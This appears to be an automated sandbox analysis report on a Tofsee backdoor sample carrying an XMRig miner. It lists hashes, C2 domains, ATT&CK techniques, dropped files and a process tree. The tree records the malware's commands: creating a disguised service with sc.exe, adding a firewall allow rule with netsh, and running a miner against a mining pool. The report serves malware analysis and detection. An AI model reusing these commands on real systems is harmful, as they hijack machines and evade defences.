Analysis

  • max time kernel
    148s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    20-06-2022 15:15

General

  • Target

    4ebb54ec22b84ff39ccda6bfb43e78099078c56fa9fc9e12e37af92725060a2a.exe

  • Size

    313KB

  • MD5

    ae9348857fab75e8711f0854ac29676f

  • SHA1

    2365f11df7aec453252e7d4fa405b2d5472cc2a2

  • SHA256

    4ebb54ec22b84ff39ccda6bfb43e78099078c56fa9fc9e12e37af92725060a2a

  • SHA512

    fdd493704147a286c21ee3f542f8c3fbb890211f73a1bd71d99d899a78557f70fb60bb5bb6e483b931de17a8b23978fa4b5909a1e62687be6993d411fe68c155

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4ebb54ec22b84ff39ccda6bfb43e78099078c56fa9fc9e12e37af92725060a2a.exe
    "C:\Users\Admin\AppData\Local\Temp\4ebb54ec22b84ff39ccda6bfb43e78099078c56fa9fc9e12e37af92725060a2a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hxciijzf\
      2⤵
        PID:976
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\iuwmypeb.exe" C:\Windows\SysWOW64\hxciijzf\
        2⤵
          PID:2200
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create hxciijzf binPath= "C:\Windows\SysWOW64\hxciijzf\iuwmypeb.exe /d\"C:\Users\Admin\AppData\Local\Temp\4ebb54ec22b84ff39ccda6bfb43e78099078c56fa9fc9e12e37af92725060a2a.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:1824
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description hxciijzf "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2456
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start hxciijzf
          2⤵
          • Launches sc.exe
          PID:736
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:2668
      • C:\Windows\SysWOW64\hxciijzf\iuwmypeb.exe
        C:\Windows\SysWOW64\hxciijzf\iuwmypeb.exe /d"C:\Users\Admin\AppData\Local\Temp\4ebb54ec22b84ff39ccda6bfb43e78099078c56fa9fc9e12e37af92725060a2a.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2716
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:2308
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1108

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Disabling Security Tools

      1
      T1089

      Modify Registry

      2
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\iuwmypeb.exe
        Filesize

        10.9MB

        MD5

        4718ed4bdba0dc8fdb34a633e519bc7f

        SHA1

        9477551fc6b2f5af5736b730ca0c233e30bf2b80

        SHA256

        1a6dcc05b57ed27dc9e0f6086aa057e3e0e7777b4284161b11327bdb00a1c9bd

        SHA512

        d68c1b95a45908348286d10f9d91f03565dba80f6ecc39d3327a19e23f85fd9cd3e287f17ee1d9dac5f42cf295ca5f289f51134c8722563cb527bbb3789cfae4

      • C:\Windows\SysWOW64\hxciijzf\iuwmypeb.exe
        Filesize

        10.9MB

        MD5

        4718ed4bdba0dc8fdb34a633e519bc7f

        SHA1

        9477551fc6b2f5af5736b730ca0c233e30bf2b80

        SHA256

        1a6dcc05b57ed27dc9e0f6086aa057e3e0e7777b4284161b11327bdb00a1c9bd

        SHA512

        d68c1b95a45908348286d10f9d91f03565dba80f6ecc39d3327a19e23f85fd9cd3e287f17ee1d9dac5f42cf295ca5f289f51134c8722563cb527bbb3789cfae4

      • memory/736-200-0x0000000000000000-mapping.dmp
      • memory/976-171-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/976-172-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/976-173-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/976-174-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/976-177-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/976-170-0x0000000000000000-mapping.dmp
      • memory/1108-514-0x0000000002EF259C-mapping.dmp
      • memory/1824-181-0x0000000000000000-mapping.dmp
      • memory/1824-182-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/1824-183-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/1824-190-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/1824-184-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/1824-185-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2200-178-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2200-176-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2200-175-0x0000000000000000-mapping.dmp
      • memory/2200-186-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2200-179-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2200-180-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2308-394-0x0000000000449A6B-mapping.dmp
      • memory/2308-485-0x0000000000440000-0x0000000000455000-memory.dmp
        Filesize

        84KB

      • memory/2308-488-0x0000000000440000-0x0000000000455000-memory.dmp
        Filesize

        84KB

      • memory/2456-189-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2456-188-0x0000000000000000-mapping.dmp
      • memory/2668-214-0x0000000000000000-mapping.dmp
      • memory/2716-399-0x0000000002F96000-0x0000000002FA3000-memory.dmp
        Filesize

        52KB

      • memory/2716-401-0x0000000002F60000-0x0000000002F73000-memory.dmp
        Filesize

        76KB

      • memory/2716-416-0x0000000000400000-0x0000000002C6D000-memory.dmp
        Filesize

        40.4MB

      • memory/2716-487-0x0000000000400000-0x0000000002C6D000-memory.dmp
        Filesize

        40.4MB

      • memory/2992-139-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-143-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-153-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-154-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-155-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-156-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-157-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-158-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-159-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-160-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-161-0x0000000000400000-0x0000000002C6D000-memory.dmp
        Filesize

        40.4MB

      • memory/2992-162-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-163-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-164-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-165-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-166-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-167-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-168-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-169-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-151-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-150-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-149-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-148-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-147-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-146-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-152-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-145-0x0000000002D60000-0x0000000002EAA000-memory.dmp
        Filesize

        1.3MB

      • memory/2992-144-0x0000000002D60000-0x0000000002EAA000-memory.dmp
        Filesize

        1.3MB

      • memory/2992-142-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-140-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-118-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-138-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-134-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-137-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-136-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-135-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-133-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-131-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-132-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-130-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-129-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-128-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-127-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-228-0x0000000000400000-0x0000000002C6D000-memory.dmp
        Filesize

        40.4MB

      • memory/2992-126-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-125-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-124-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-123-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-122-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-121-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-120-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB

      • memory/2992-119-0x0000000077360000-0x00000000774EE000-memory.dmp
        Filesize

        1.6MB